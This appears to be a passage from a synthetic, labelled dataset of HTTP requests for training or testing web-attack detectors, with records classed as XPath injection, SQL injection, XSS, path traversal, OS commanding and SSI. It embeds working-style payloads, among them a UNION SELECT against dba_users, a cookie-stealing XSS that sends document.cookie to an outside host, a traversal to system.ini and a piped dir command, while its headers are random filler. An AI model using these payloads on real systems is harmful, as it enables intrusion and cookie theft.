User-Agent: afcgncd0ntb
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: 0.1 www.rteuti.jpg
Transfer-Encoding: compress
Upgrade: sthE/6.6, egoocs/5.7, dh7/2.0
Warning: 544 147.190.206.64 "e6Olrstooilettn" 
X-Forwarded-For: 119.112.244.238
X-Serial-Number: 6943669939
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47630
Start - Id: 48466
class: XPathInjection
GET /sOxWw/soiq0WTvBmqtCB4yg/CbFpcwmXGP6/htuste/aoem1twonHAnadHcmwa/ethedvdbeUf/h5fv1VeTZrMo65JJ7Kx/rUg.asmx? HTTP/1.1
Host: 252.94.74.68:80
Connection: iraad
Accept: audio/x-wav;q=0.8, audio/*
Accept-Charset: hz-gb-2312, euc-jp, isiri-3342, windows-1252
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: EsrrEw='1o'
Client-ip: 50.174.183.166
Cookie: i9=sodswenoral;emsaset0ciii9=sor3l'   or count(    path/child::node()[position(  )=((  i  +j+ k +   l    + 1)] |   path/child::*()[position()=(k+1)])=1     or   'eexi1es' =   ' sltbwg'   or;rulvnnetntfso=eomtma82sEtrhd;d9
Cookie2: $Version="6"
Date: Tue, 13 Oct 09 20:12:50 UTC
ETag: "_835G29BP3A18xvXjR3Q"
Expect: 100-continue
From: iieeird@eetztl.net
If-Modified-Since: Thu, 23 Apr 09 08:14:33 GMT
If-Unmodified-Since: Sun, 11 Apr 10 09:11:52 GMT
If-Match: "nXvFJX5NXdUnhnr8m3"
If-None-Match: "9ZZrKkXswWQv@ufi"
If-Range: "kKOUJpE_Op_B3MjaK"
Max-Forwards: 593
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.zThFhn8.gov/penrbId/hf5i/ztSaaehE/ceshan/Skts6r.php3
Authorization: NTLM ZXNuczVlb2FhZTN0VGhlZXVpdW5vZHV0Mm53d3dubnIzbjNPRHRocm0=
Range: -524
Referer: http://www.a1Ao.cz/seis/ia01oa.jpeg
TE: gzip;q=0.2,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.3 (X11; U; Open BSD i586 2.2; he-F9; rv:3.3.2) Gecko/80041145
UA-CPU: x86
UA-Disp: 5787,577,8
UA-Color: color16
UA-Pixels: 473x8946
Via: HTTP/4.4 100.199.13.11:54795
Transfer-Encoding: nemrmh; yssBda=a13en
Upgrade: tReso/6.3, eIs/3.2, AtK2/2.4, vdc/5.5, mlse/4.2
Warning: 052 www.UhayisJ.htm "4endadee4" 
X-Forwarded-For: 194.7.222.25
X-Serial-Number: 326579
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48466
Start - Id: 42043
class: SqlInjection
GET /ck4@bodyGWWHb_u/86G6jVlikedFNDvbscriptWN/vlrtXEtehl4teeiErabe/sE72z.fi5/nQbrgrZkE/opzJ3kEjxBMGDad.cgi?7lu7m=taa%27++UNION++++%2F**%2F+++++SELECT++++Tevte+++++FROM++dba_users++WHERE++++zReihPt+++++like++%27%2525 HTTP/1.1
Host: 161.58.233.10:419
Connection: twlite
Accept: */*;q=0.7
Accept-Charset: cp-950, ks_c_5601-1987;q=0.7, cp-932;q=0.5, euc-kr;q=0.9, cp-932;q=0.2
Accept-Encoding: compress, compress
Accept-Language: go7-hii52Et;q=0.1, x6nptgp-Gs0a6;q=0.8
Cache-Control: no-transform
Client-ip: 132.226.35.244
Cookie: cmdKIhomethdhjyeQ=5Ln
Cookie2: $Version="2"
Date: Tue, 09 Aug 05 23:54:44 UTC
ETag: W/"uOBspEWpCogeDnL"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Sat, 27 Mar 10 22:52:33 CET
If-Unmodified-Since: Wed, 26 Apr 06 22:35:29 UTC
If-Match: "3BXxFiC8FP_@k2Gn"
If-None-Match: *
If-Range: *
Max-Forwards: 2791
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: 5heq iYitkt=3sapN
Authorization: Digest response="859b51C4AfBb44A1bAaFB219Eeb03cac"
Range: -7
Referer: /gtax/bnheclt1/t9gt/ody5y/79Ubne.cfm
TE: deflate;q=0.5
Trailer: Accept
User-Agent: Mnnot/2.8.5.8.9
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 422x9399
Via: 8.0 www.ipeLehc.htm, 0.7 25.139.239.228, FTP/5.2 www.o7Iroc.tiff
Transfer-Encoding: 9sidq; v4oyRNt=rnxsdz1s
Upgrade: hUrier/3.1, imsa/1.4, hntw/4.9
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 78968713276550254
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42043
Start - Id: 35509
class: XPathInjection
GET /aSao2/LoEkaa.gif?os79vFy5iegEyu=4312221&Ce-blduAF5LB=v&aeptloms=40397553&0iealcwf3cis=ceoA&o5G0=eXMoBBraKth&fmkommtaiwiMlie=399371267&aetecinv=y%3FH-e&AtionAs8sgwawnU=627597907&InlR=%3Aalikee+obee&oUCweamsiNsi=42309&tfcn=httpNT%2B%3C+ohoes&rl=84365365 HTTP/1.1
Host: www.hnhteois.cz
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, koi8, x-mac-arabic;q=0.5, x-mac-japanese
Accept-Encoding: compress;q=0.3, identity;q=0.2, gzip;q=0.4
Accept-Language: nr-oOm1E, ee-9thueth, r-eal, tbin0tg-lnq, r5so5ao-eajrE8Tw;q=0.3
Cache-Control: no-store
Client-ip: 154.234.253.239
Cookie: cniR7sysa5r3=(i     <    count(ig/child::text())     and  j  <     count(nueLt4/child::comment())  and    k <    count(yNma5/child::*)   );5m=coke9;leammT7eie6fl=N;s?odocument7&[i:epLE;A5wkvgq@bkV@=wirl7mt
Cookie2: $Version="51"
Date: Thu, 01 Dec 05 16:14:23 CET
ETag: W/"G2wUUoO@GURB-KMx"
Expect: 100-continue
If-Modified-Since: Sun, 16 Oct 05 07:21:29 GMT
If-Unmodified-Since: Tue, 27 Jan 04 16:49:46 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 7.2
Pragma: no-cache
Authorization: NTLM dHhmZmV0ZXRhcGVuZmRuZWZ0Z21sTGU0bmV1am5lb3V5RUhlc0I=
Range: 701300-17610,787563-,170555-675966
Referer: /tZhs/4o8jL/mqsknrd0.nsf
User-Agent: cbb.ptF9 http://www.6aom.net
UA-CPU: 68000
UA-OS: Windows 98
Via: 9.3 www.ccspoha.tiff
Transfer-Encoding: gzip
X-Forwarded-For: 215.42.188.148
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35509
Start - Id: 48793
class: XPathInjection
GET /Ktom.gif?oOsPM5bpositiont49V=79076953&eslrvoAu=aoiuobro&nlrgEams6vy=a&ke=qsh&wPdfas8gsg=eC9&RrnZ81=osbhs&zmJiq-HIrmuU=3661338485&tht6gl=b2otf%27+++++or++++senon%2Fptn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D72%5D++++or++%27nlnaci%27+++%3D+%27 HTTP/1.0
Host: www.anncs6lx.biz:80
Connection: Fwgdono
Accept: video/*;q=0.8, image/*
Accept-Charset: ks_c_5601-1987;q=0.5, koi8
Accept-Encoding: deflate
Accept-Language: arhs-regbxp6;q=0.6
Cache-Control: max-stale
Client-ip: 208.70.172.168
Cookie: Hscsuaehs=0769;noratte9rwal=qLs8q
Cookie2: $Version="7"
Date: Thu, 08 Mar 07 06:47:20 GMT
ETag: W/"gTz@WD@id8M7yzIPzc"
Expect: 100-continue
From: iinongn@mnxs.it
If-Modified-Since: Sun, 05 Aug 07 10:19:33 UTC
If-Unmodified-Since: Thu, 30 Oct 08 12:50:32 GMT
If-Match: "YFv-lF@_xRzJkWeK"
If-None-Match: "74HR2O4YVz1@XdjWuPQv"
If-Range: *
Max-Forwards: 1879
MIME-Version: 7.6
Pragma: Alomfn6r='ado'
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: NTLM Z1NzbHJOYTZpazFlZ2hlcmFlcWFpa3I1YWVzaW1zV3JjcnNzb3JldE1jOA==
Range: -2670
Referer: /h1eMtree/hs6hs.fgf
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/1.4 (Windows; U; Win 9x 5.2; ht-1q; rv:4.3.8) Gecko/86066126
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: HTTP/2.1 www.tsttIrr.htm, 2.7 113.189.150.76
Transfer-Encoding: compress
Upgrade: zT3/4.9, hrK1te/0.3, iIQppa/8.1, uhVyt/5.1
Warning: 435 www.dsxS.html:99 "eing" "Thu, 16 Jun 05 09:56:23 CET"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48793
Start - Id: 47001
class: XSS
GET /rnrTTdr.css?cctosovawaz=f%40xz&mietr=0&aa=%3Cimg++++src++%3D++%22+++++mocha%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.erna.com%2Fcgi-bin%2Ftoer.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+%3E&riesaaeoesE=ltuv&laiIE=2544745&e0shr=0322&oacedcRtCiArEq=klc&UftpEechoMRQM=td&Rtxdc3a8ddji=qlhavingst&lhedpI4=aTc0ae.aaD&xg@@RdX=7760210773 HTTP/1.1
Host: www.al1o.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 0.51.121.220
Cookie: ugnpd=21;0log..k2=oeaua;smdaI=o<aiille%insert
Cookie2: $Version="481"
Date: Thu, 06 Aug 09 18:48:27 UTC
ETag: "o8HdQMwRnEl_XlX"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Thu, 26 Aug 04 21:11:59 UTC
If-Unmodified-Since: Mon, 26 Jan 09 14:59:57 CET
If-Match: *
If-None-Match: "FdOH1T9pSY3.jMVK0r"
If-Range: "eMzC@nDWd-raKvm"
Max-Forwards: 010
MIME-Version: 0.5
Pragma: knN9mase=is
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: NTLM c2VtbWNSZWV1cHJqZWF0dWRlaE1lNm1yYzNsTmlhY2VuMUFsYm9paA==
Range: 5-22964
Referer: http://liEiktdn.net/rEztos/uup0/2tdo91Rt/sbqh.html
TE: trailers
Trailer: Upgrade
User-Agent: eSg5HzwEwA http://www.ElueyE.ch
UA-Disp: 0784,5825,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: 1.8 152.56.81.129:91882
Transfer-Encoding: gzip
Upgrade: 5ve/2.6, a1rbm/0.6
Warning: 544 www.ccrt.gif "oteAehiueo" "Fri, 15 Apr 05 23:43:34 GMT"
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 09560109
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47001
Start - Id: 35736
class: XPathInjection
GET /4htftoxenXo/bs4adb/frcacryWJJ-QD@aHstci/Rf/9paEMfIeotiquanoae/sWGZW3Cr/gpgtribwnsbsnnemR/hg.DY6wtV-/xsU1/fqS7qc_.bin?rd4xtiamtDCs6=S%26lallg0a%25a%29&reto=de9aT&yF2SoVslhxY=ihaeoriots&5lTs388s5fw=t1eiaedbnthei4&ZxbyJhEsI.ub=yelttgswgdNNxl&linkN9dhY2U=%26a6t&7sobhtmet=rl5fyhRgq-&trs9nakehf=ecn488tolgpt5hrssh&blaiomSk=h3ljn&hsetrEnieet=n7h1aht6&umbk=27732266&moGtS11DmCupdate=teegrul4iocUt&ts0arni0=tpt%27++or+++1%3C+ees%2FiN2e%2FaS%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D51%5D+++or++%27tjeil%27++++%3D+++%27 HTTP/1.0
Host: www.i0isnrrhSe.org
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw;q=0.9
Accept-Encoding: 
Accept-Language: hegsi64l-ns2y
Cache-Control: min-fresh=93
Client-ip: 55.42.106.115
Cookie: zmAliwwf6rud=awesalinky0~ynoh;aitnRnt=yo;hteeu=40;5rh=cBu;rM_iS=fuvolve
Cookie2: $Version="4"
Date: Fri, 21 Jan 05 03:12:27 CET
ETag: W/"-PRK3VV8os1f081zURL"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Wed, 24 Jan 07 14:49:37 CET
If-Unmodified-Since: Sun, 25 Jun 06 23:14:26 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Feb 04 22:31:17 CET
Max-Forwards: 22
MIME-Version: 4.7
Pragma: unet='gry7dqfa'
Proxy-Authorization: Digest username="ta7oAu"
Authorization: Digest nonce
Range: 820401-
Referer: /rsiMbuw.php4
TE: gzip,trailers
Trailer: Trailer
User-Agent: ofrntOt (hnRyBCv7E; z_GLzax2P5; sDhLlcC6)
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: FTP/7.5 55.50.151.27, hiAtn/7.8 www.etihU.jpg
Transfer-Encoding: deflate
Upgrade: ttidl/7.3, a5gzg/3.5, Gca/8.0
Warning: 093 www.Ieie.htm "d6amUeljrciludeds4l" "Sat, 17 May 08 17:12:51 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 61503803
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35736
Start - Id: 45020
class: PathTransversal
POST /rx78Qxblyp0/9MQj-2KHaccept/y6Ae/sHIrsd7cieeattg/reXmO/th5.cgi? HTTP/1.0
Content-Length: 60
Content-Language: 6mg,liot,h3ilpm
Content-Encoding: gzip
Content-Location: /rweRue5.mp3
Content-MD5: OGxwcHlhbWVoaXJzOWJkOA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 May 05 03:10:13 UTC
Last-Modified: Wed, 12 Dec 07 12:12:44 UTC
Host: 10.97.240.42
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: doc(   file:///c:/iefde/Tet71.xml  )
Accept-Language: iA3asa-ota;q=0.8, 1o8-oq3idtnf;q=0.8
Cache-Control: max-stale
Client-ip: 24.123.18.228
Cookie: Ei9etneel=hvhectawjasOcriwl;ode5areAS6n=sdume0vareag
Cookie2: $Version="81"
Date: Tue, 19 Jan 10 08:59:09 UTC
ETag: "U_ur8zwGDcFU9al"
Expect: eaNtd=rtEse;Iuclkar=25mteh
If-Modified-Since: Thu, 27 Oct 05 24:23:01 GMT
If-Unmodified-Since: Fri, 07 Sep 07 17:43:53 GMT
If-Match: *
If-None-Match: *
If-Range: "kclcgyqmVqIQiBTyWeQ5"
Max-Forwards: 08
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM aHQwZWhMbnRvbHN5aUVlZXJlaW4yZmV0ajNJcm5jYUR4Ym9ldGc=
Authorization: Tree 5hilnijS=end3dl
Range: 1-,899478-
Referer: /Iiulf.nsf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 9.2; eg-3S; rv:3.5.1) Gecko/52558819
UA-Disp: 055,113,32
UA-OS: Win98
Via: FTP/7.7 www.vnencot7.jpg:87920, FTP/6.4 www.rEja.htm
Transfer-Encoding: compress
Warning: 554 www.ntprnIr.shtml:5780 "gtr0ts" 
X-Forwarded-For: 134.92.52.47
X-Serial-Number: 42668725
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

edntcoSrdrno=dd&tbslh=fOlevalp1golmstepse0&8mtiraeo=19343900

End - Id: 45020
Start - Id: 42545
class: SqlInjection
GET /xi/IgLNkssse78thne9w0m.shtml?us3nanx4olc=914&1rneteihemro=%27++OR++%27oeixDter%27+LIKE++++%27aze%2525 HTTP/1.1
Host: 122.71.220.174:14
Connection: close
Accept: audio/*
Accept-Charset: koi8-r, x-mac-icelandic, iso-8859-3;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 15.200.32.132
Cookie: BAbotorI=sQ0-c2aI8;lasakteprgsws=tgfprocessing-instruction4nwhtsi9fj;ywzexh1ot5oo7=34
Cookie2: $Version="1"
Date: Tue, 29 Jul 08 16:55:56 GMT
ETag: W/"gEAy5nWg0ykG4kp-"
Expect: oc967Rm
From: bs1as@pton6i0pc.org
If-Modified-Since: Sat, 12 Dec 09 07:49:49 GMT
If-Unmodified-Since: Sun, 10 Feb 08 24:23:11 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 84
MIME-Version: 3.7
Pragma: rdhie=tvS
Proxy-Authorization: NTLM ZW9hbnRtYnlsRXN0c3BBYXR5ZzhTczhhM29Fb3NvcGQ=
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: 6-84675,628-,982-49
Referer: http://Eerns.fr/r1ebo2p/tiba/Esiee.wav
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/7.0 (compatible; ne50oca05; Win 9x; MhCtgibuu)
UA-CPU: x86
UA-Disp: 591,320,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8264x986
Via: 7.7 www.salfoeT.png, 0.2 www.1lrhr.css, HTTP/4.2 87.92.174.85:17978
Transfer-Encoding: compress
Upgrade: aehy/9.2, etyl/6.6
Warning: 563 www.aePi5.gif "edicbUoeitewfnmtlui" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 1876106760
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42545
Start - Id: 44199
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.ynmhnusa.gov
Connection: thpt1ats
Accept: */*;q=0.0
Accept-Charset: windows-874, x-mac-korean;q=0.4, windows-1251, euc-tw, utf-7
Accept-Encoding: *;q=0.6
Accept-Language: i-0hYtwe5;q=0.1, terasoi-ai0wmvrc
Cache-Control: no-transform
Client-ip: 130.86.46.202
Cookie: tbeo=child
Cookie2: $Version="1"
Date: Sat, 02 Apr 05 03:57:13 CET
ETag: "GJ.WMW9KP4T-6JR1LW"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Tue, 09 Mar 10 14:19:14 CET
If-Unmodified-Since: Wed, 15 Aug 07 14:28:38 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Apr 10 04:27:39 CET
Max-Forwards: 0
MIME-Version: 8.7
Pragma: tt=tpaiftrd
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest qop=auth-int
Range: 22399-
Referer: /EDgse/wtwE7g/fosqdr0/zhesehb.ace
TE: chunked,gzip;q=0.9
Trailer: Referer
User-Agent: Mozilla/4.0 (Windows; U; WinNT 0.1; gm-6t; rv:6.9.9) Gecko/65377670
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: FTP/3.3 34.131.158.29:9022
Transfer-Encoding: deflate
Upgrade: mrn/4.8, niDaor/3.7, h2u/1.0
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44199
Start - Id: 49414
class: XPathInjection
GET /mRrgs84wleesocosr/5tdqces04t2/J4/bqjIS-9@Wagj/VincludeAlk7II2pnc-la3/UdM3.asp?jporetc=%28i+%3C+++++count%28de%2Fchild%3A%3Atext%28%29%29+++and+++++j++%3C+count%289vn%2Fchild%3A%3Acomment%28%29%29+and+++++k++++%3C++++count%28sam%2Fchild%3A%3A*%29++%29&el7s=t%7CeemNyiiE2r+&6bcHip=y&pabaer=+mt+&o1eiFnttlzsgten=759&IqEasn3=42177124&skae=Oon%25sinoehd7&WAEcitsRaTErb=e&Oe4I=54145&ur3tnei9ee=9201&bd=79103&Bo9wyasiTr=kdrlkl HTTP/1.1
Host: www.tn3gnjn2ht.com
Connection: qcieornn
Accept: */*;q=0.9
Accept-Charset: windows-1253;q=0.3, shift_jis, cp-932;q=0.0, macintosh;q=0.7, iso-8859-8-i;q=0.4
Accept-Encoding: 
Accept-Language: T4limClW-nciseIAu;q=0.7, 9Y1Ijpea-toi, r-eet8
Cache-Control: no-cache
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="9"
Date: Sun, 12 Sep 04 12:00:55 GMT
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: 100-continue
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Fri, 22 Dec 06 12:56:08 GMT
If-Match: "_9QTrUaBVPXaYoFY1"
If-None-Match: *
If-Range: *
Max-Forwards: 9036
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic bmhvaW9vOnR0bm9zdTY=
Authorization: Digest realm
Range: 77585-376599
Referer: /tghcnlHc/t26oa/9hNecl.php3
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: Mozilla/1.3 (Windows; U; Win 9x 8.1; cx-hq; rv:1.0.1) Gecko/88732455
UA-CPU: StrongARM
UA-Disp: 422,204,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: roOe/0.5 www.yjarcai.png:6
Transfer-Encoding: dbEg; tceme=Eo2ei7
Upgrade: dec/5.5, 4kklt/1.7
Warning: 222 29.185.139.144 "meri5fe" "Sun, 16 Aug 09 09:30:25 UTC"
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49414
Start - Id: 45659
class: PathTransversal
GET /eRdoS8sanno/updateqx3/4hw4/ut5y/wr1QDY/eKe/-kmGITv.shtml?VHdorkdmm=Ie&ah=hiL%25f2eb&GFcVWB=swd+u&sOmsekdoaCea=dcnR6m&ilDAri=eizhoioimgscriptnhgr0r+o&kniureEeem=55&Nimoyhor=66029&lldaUgcLeor=eted&tehsaE7ehisTe=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&t3qv8oNwam=stft%28i6qt+yieoeformn&evmhEvest=71 HTTP/1.1
Host: www.c1risrz.de:6185
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.2, us-ascii;q=0.6, koi8
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 189.129.104.202
Cookie: soeatiyen3tf4m=);dsre1thtsoeSe=60792879;esasesdisiv=64672;ernueecodz0d=senn
Cookie2: $Version="46"
Date: Sat, 25 Sep 04 02:16:18 CET
ETag: W/"7x6zWK4vVBctAGUO"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Tue, 04 Apr 06 23:02:03 GMT
If-Unmodified-Since: Fri, 24 Dec 04 16:52:50 GMT
If-Match: "w6At@Pqt6aQd3CsN6"
If-None-Match: *
If-Range: "PAA3Ys3l0qu2BAXi"
Max-Forwards: 3
MIME-Version: 6.6
Pragma: ar='c3a'
Proxy-Authorization: NTLM V2FscmdtaW9sb2FkYWFoZ05FcnNlbkhqYXJwTG8zakEz
Authorization: NTLM ZWMzdGQ1Z2RnZTN1ZXdlbjBlMm90ZDc1eWhwZWh1Z24wZWVoT3RydDdl
Range: 92916-
Referer: /DrLetok/ot3z/suteo.mpeg
TE: trailers,chunked;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/3.7 (Windows; U; Win98 1.5; ea-oe; rv:3.9.2) Gecko/67605694
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: HTTP/0.2 www.ctwsqwsd.html, 0.0 www.snibRf.png:0
Transfer-Encoding: compress
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 878 36.126.187.244:5468 "Nwnmte1bhOIhe" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45659
Start - Id: 49939
class: XPathInjection
GET /5ZP-8zCtmfIH/sPXIy3nyZdU03/r6a77/gxgy0B8A.8_/JCtZw/tyuxrV/vOqdowhseiyac25Ujmhs/sAbuddcehApeyeboaIyg/seue0sh/Uw/Ktmotrulaf3ebin/nkQR3GgD.sh?ayutwl0=dljoxLh%27++++or+++++%28i+%3C+++++count%28smLo%2Fchild%3A%3Atext%28%29%29+++and+++++j+++++%3C+++count%281eslb%2Fchild%3A%3Acomment%28%29%29++++and++k++%3C+++count%28oa%2Fchild%3A%3A*%29+++%29+++or++++%277egc3mLe%27++%3D++++%27++prdel%27+or&rS570rKbOPNd=u-GOt&ahodesTauhlusic=u%3D HTTP/1.0
Host: 118.201.86.206
Connection: close
Accept: audio/*, image/*
Accept-Charset: cp-950, iso-8859-5, x-mac-chinesetrad, x-mac-chinesetrad;q=0.7, cp-936
Accept-Encoding: 
Accept-Language: eQrtr7e-hNs9rh;q=0.5, 1t8teth-o85llElz, e1-aur;q=0.7
Cache-Control: de5r=tfcnny
Client-ip: 69.149.110.120
Cookie: hogd=Rsssehmrr7reuonb;Eiooasy8aOM=h8lcozton5Noaaemp
Cookie2: $Version="1"
Date: Fri, 10 Apr 09 04:04:34 UTC
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: gxo4Nam@arrt3.it
If-Modified-Since: Sat, 12 Feb 05 19:37:07 GMT
If-Unmodified-Since: Thu, 19 Apr 07 19:43:28 CET
If-Match: "PSWbC8fqvasOkJB8m"
If-None-Match: "cudpx8fJKEO6l07"
If-Range: Wed, 17 Jun 09 19:08:31 GMT
Max-Forwards: 3224
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM bmhlc3JhZmx0ZHFibzVlY2FvZm1qczNUZW5hbGFObXdzbg==
Range: 33-0
Referer: http://e0Umhie.cz/znadb8/hoEu.asp
TE: deflate,trailers,gzip
Trailer: Via
User-Agent: gv5oahHe4ubhdaA
UA-CPU: x86
UA-Disp: 4764,9289,32
UA-OS: Linux
UA-Pixels: 299x2707
Via: HTTP/6.3 www.6Vaul.htm
Transfer-Encoding: vTas; oeeMruy=weNwsn
Upgrade: oepjtw/9.0, eribt/2.4, enN/6.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49939
Start - Id: 39249
class: SSI
GET /G2homebgsoundL/tshdtD/pegturDkeh.swf?lviptEeimpipd=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&jhoStsem=vbscriptapasswdssItdbsfroma6&etile=vare&SO6mochajk39p=fcM HTTP/1.1
Host: 206.139.110.212
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=861
Client-ip: 213.207.160.227
Cookie: auebhRA4mink=616884075;nezeiontcr0noi=2329257640
Cookie2: $Version="0"
Date: Mon, 30 Aug 04 10:04:12 UTC
ETag: "7anuzjgnmLe6t-y3"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 30 Jul 04 13:48:10 UTC
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: "JxwGh.45.f9Swmwp"
If-None-Match: "6k9onyt6SyILE@.@3"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 04
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM c250cnlGYWlvdVJaZ0VxdHM4Tm9yZnJ0ZDBoZm9sdGVm
Range: 5-9725,-6683
Referer: /THgs/eech/jt6dr9.js
TE: deflate,trailers,gzip;q=0.7
Trailer: Range
User-Agent: Mozilla/9.4 (Machintosh; U; PPC 7.7; an-nk; rv:6.4.4) Gecko/14501869
UA-CPU: MIPS
UA-Disp: 979,109,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 272x2054
Via: FTP/8.2 69.159.239.55
Transfer-Encoding: identity
Upgrade: ueiyd/3.1, tac/2.4, eiz/0.3, isofl/2.9, eutR/4.6
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39249
Start - Id: 48383
